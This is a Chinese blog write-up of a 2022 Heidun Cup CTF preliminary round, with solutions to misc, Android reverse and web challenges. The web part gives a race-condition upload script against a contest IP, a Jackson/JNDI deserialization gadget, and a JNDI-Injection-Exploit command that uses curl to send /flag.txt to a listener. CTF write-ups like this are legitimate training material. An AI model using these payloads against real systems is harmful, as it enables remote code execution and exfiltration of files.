2022 Heidun Cup Writeup [初赛]

一年一度的黑盾

线下:2022黑盾杯线下渗透一记

Misc

看不见不等于没有

看不见的字符转换为hex2009

替换成AB

感觉是摩斯,替换后用工具梭哈

The word is not the word

打开文档,猜测是文档隐藏字符串

全选择,右键字体,把隐藏勾掉,然后把所有文字改下颜色即可

flag{heyiamherejustinthedocx}

Reverse

HeidunGame

下载拿到一个apk附件,直接解压,然后拖到dex2jar.bat还原成jar文件

然后 jd-gui 打开在 com.example.heidungame.data.model.LoginDataSource.class 包里发现 flag 字样,左右相等拼接出 flag

flag{heidun_game_of_android}

Web

Do you secure

右键打开发现base64编码后的字符串。

依次解开得到

dXBsb2FkX2luZGV4LnBocA==

S0ZDLUNSQVpZLVNVTkRBWS1WTUU1MA==

upload_index.php

KFC-CRAZY-SUNDAY-VME50

访问 upload_index.php 抓包上传,发现php文件死活传不上去,后来仔细分析发现文件传上后会立马删除,这里直接写个脚本条件竞争下就好了。

# Author: rYu1nser
# Date: 2022/9/25
# @Po7's Metadata Powered by rYu1nser
import requests
import time
burp0_url = "http://39.104.68.128:53521/upload.php"
burp0_cookies = {"thejs.session": "s%3A64HQdSpgAlG9deMpDu59n7IWhb5hHG_r.BhlyP7L52ViHQi6Pkx8IWOtQ%2BUiZotsB1OeHpt22HI0"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://39.104.68.128:53521", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary92NwstIA0In7Y75l", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://39.104.68.128:53521/upload_index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Connection": "close"}
burp0_data = "------WebKitFormBoundary92NwstIA0In7Y75l\r\nContent-Disposition: form-data; name=\"pic\"; filename=\".php\"\r\nContent-Type: text/html\r\n\r\n\r\n------WebKitFormBoundary92NwstIA0In7Y75l--\r\n"
while True:
     url = 'http://39.104.68.128:53521/upload/' + str(int(time.time())-1) + '.php'
     res = requests.get(url=url)
     res1 = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
     print("[!]")
     print(res.url)
     print(res1.text)
     print("[!]")
     if('flag' in res.text):
          print(res.text)
          break

EzJava

经典shiro题,扫目录发现访问login,会跳转到json,然后给你一个JSESSIONID

访问login,要求我们登录,那我们就登录,构造参数usernamepassword,发现登录失败,但是返回包返回了rememberMe=deleteMe字符串

可以发现该题是用shrio框架写的,猜测有shiro反序列化漏洞

猜测失败。后来又考虑到shiro权限绕过漏洞,抓包改包成下面这个

 

结合报错内容,发现可能存在jackson反序列化漏洞

 

直接工具梭哈

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl http://:11111 [email protected]/flag.txt' -A ""

然后本地开个端口监听。

nc -lp 11111

找条链子直接打就可以了

["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://[IP]:11451/6todn5"}]

flag{1be1840c13}

文章《2022 Heidun Cup Writeup [初赛]》采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: www.bilibili.com
Source: ななひら
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
嘉然
ななひら
小恐龙
花!
上一篇
下一篇